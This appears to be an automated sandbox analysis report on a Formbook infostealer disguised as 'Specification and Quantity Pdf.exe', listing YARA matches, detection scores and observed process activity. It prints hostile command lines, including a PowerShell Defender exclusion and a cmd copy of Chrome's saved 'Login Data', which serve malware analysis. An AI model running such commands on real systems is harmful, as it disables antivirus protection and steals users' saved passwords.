          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04566BD710_2_04566BD7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04525BF010_2_04525BF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044EDBF910_2_044EDBF9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044CFB8010_2_044CFB80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0034103010_2_00341030
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0034120A10_2_0034120A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00342D9010_2_00342D90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00342D8710_2_00342D87
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00349E6010_2_00349E60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00349E5B10_2_00349E5B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0035D73010_2_0035D730
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00342FB010_2_00342FB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042CA03610_2_042CA036
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042C2D0210_2_042C2D02
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042CE5CD10_2_042CE5CD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042C108210_2_042C1082
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042C891210_2_042C8912
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042CB23210_2_042CB232
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042C5B3010_2_042C5B30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042C5B3210_2_042C5B32
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: String function: 00007FF773C5C1A0 appears 63 times
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 03887E54 appears 89 times
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 038AEA12 appears 84 times
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 0382B970 appears 263 times
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 038BF290 appears 105 times
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 03875130 appears 36 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 044F7E54 appears 96 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0451EA12 appears 86 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 044E5130 appears 36 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0449B970 appears 265 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0452F290 appears 105 times
          Source: Specification and Quantity Pdf.exeStatic PE information: invalid certificate
          Source: Specification and Quantity Pdf.exeBinary or memory string: OriginalFilename vs Specification and Quantity Pdf.exe
          Source: Specification and Quantity Pdf.exe, 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSinglePerCoreLockedStacks.dllT vs Specification and Quantity Pdf.exe
          Source: Specification and Quantity Pdf.exe, 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSinglePerCoreLockedStacks.dllT vs Specification and Quantity Pdf.exe
          Source: Specification and Quantity Pdf.exeBinary or memory string: OriginalFilenameSinglePerCoreLockedStacks.dllT vs Specification and Quantity Pdf.exe
          Source: Specification and Quantity Pdf.exe.0.drBinary or memory string: OriginalFilenameSinglePerCoreLockedStacks.dllT vs Specification and Quantity Pdf.exe
          Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.3767102018.0000000010A5F000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Specification and Quantity Pdf.exe PID: 7692, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 7924, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: wmplayer.exe PID: 7956, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: rundll32.exe PID: 8156, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@17/11@12/2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00E93C66 LoadLibraryExW,GetLastError,FormatMessageW,RtlImageNtHeader,SetProcessMitigationPolicy,10_2_00E93C66
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C61830 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,0_2_00007FF773C61830
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00E9205A CoCreateInstance,10_2_00E9205A
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeFile created: C:\Users\user\Specification and Quantity Pdf.exeJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f5ourtqv.q22.ps1Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeCommand line argument: WLDP.DLL10_2_00E94136
          Source: C:\Windows\SysWOW64\rundll32.exeCommand line argument: localserver10_2_00E94136
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
          Source: rundll32.exe, 0000000A.00000003.1403521076.000000000086C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3749703001.000000000086C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000003.1399455599.00000000033BA000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1399718470.0000000003395000.00000004.00001000.00020000.00000000.sdmp, DB1.12.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: Specification and Quantity Pdf.exeVirustotal: Detection: 68%
          Source: Specification and Quantity Pdf.exeReversingLabs: Detection: 65%
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeFile read: C:\Users\user\Desktop\Specification and Quantity Pdf.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Specification and Quantity Pdf.exe "C:\Users\user\Desktop\Specification and Quantity Pdf.exe"
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfileJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
